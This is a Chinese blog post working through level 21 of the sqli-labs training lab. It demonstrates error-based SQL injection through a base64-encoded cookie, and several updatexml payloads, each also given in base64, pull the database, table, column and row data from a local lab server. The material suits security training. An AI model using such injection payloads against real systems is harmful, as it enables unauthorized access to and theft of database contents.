侧边栏壁纸
博主头像
小志IT知识库博主等级

人生可以拼可以闯,但不能忘本!

  • 累计撰写 84 篇文章
  • 累计创建 45 个标签
  • 累计收到 106 条评论

目 录CONTENT

文章目录
靶场练习 sqli-labs

sqli-labs系列——Less-21

CZ
CZ
2023-06-19 / 0 评论 / 0 点赞 / 341 阅读 / 2882 字 / 正在检测是否收录...
温馨提示:
本文最后更新于 2024-04-24,若内容或图片失效,请留言反馈。部分素材来自网络,若不小心影响到您的利益,请联系我们删除。

前言

第21关貌似跟20关是一样的,登录后同样显示你的相关信息,但是仔细一看他的cookie值是被base64编码的,那我们把我们的payload也进行编码尝试注入

前期准备

开启phpstudy,开启apache服务以及mysql服务

图片-1686619451321

实验环节

浏览器访问Less-21

http://192.168.199.135/sqli-labs-master/Less-21/

image-1687160755551

进行简单闭合,页面正常显示

Dumb') -- xz
base64编码后:RHVtYicpIC0tIHh6

image-1687161972784

判断库名

Dumb') and updatexml(1, concat(0x7e, database(), 0x7e), 1)-- xz
base64编码后:RHVtYicpIGFuZCB1cGRhdGV4bWwoMSwgY29uY2F0KDB4N2UsIGRhdGFiYXNlKCksIDB4N2UpLCAxKS0tIHh6

image-1687163093883

判断表名

')and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security'limit 0,1),0x7e),1)-- xz
base64编码后:JylhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCB0YWJsZV9uYW1lIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5J2xpbWl0IDAsMSksMHg3ZSksMSktLSB4eg==

image-1687162194875

判断列名

 ')and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),0x7e),1) -- xz
base64编码后:ICcpYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdlLChzZWxlY3QgY29sdW1uX25hbWUgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9zY2hlbWE9J3NlY3VyaXR5JyBhbmQgdGFibGVfbmFtZT0nZW1haWxzJyBsaW1pdCAwLDEpLDB4N2UpLDEpIC0tIHh6

image-1687162329113

判断数据

')and updatexml(1,concat(0x7e,(select id from emails limit 0,1),0x7e),1)-- xz
base64编码后:JylhbmQgdXBkYXRleG1sKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBpZCBmcm9tIGVtYWlscyBsaW1pdCAwLDEpLDB4N2UpLDEpLS0geHo=

image-1687162441652

0
sqli-labs bp抓包 报错注入 cookie注入 base64注入 sql注入
版权归属: CZ
本文链接: https://www.xzmcz.cn/archives/sqli-labs%E7%B3%BB%E5%88%97less-21
许可协议: 本文使用《署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)》协议授权

评论区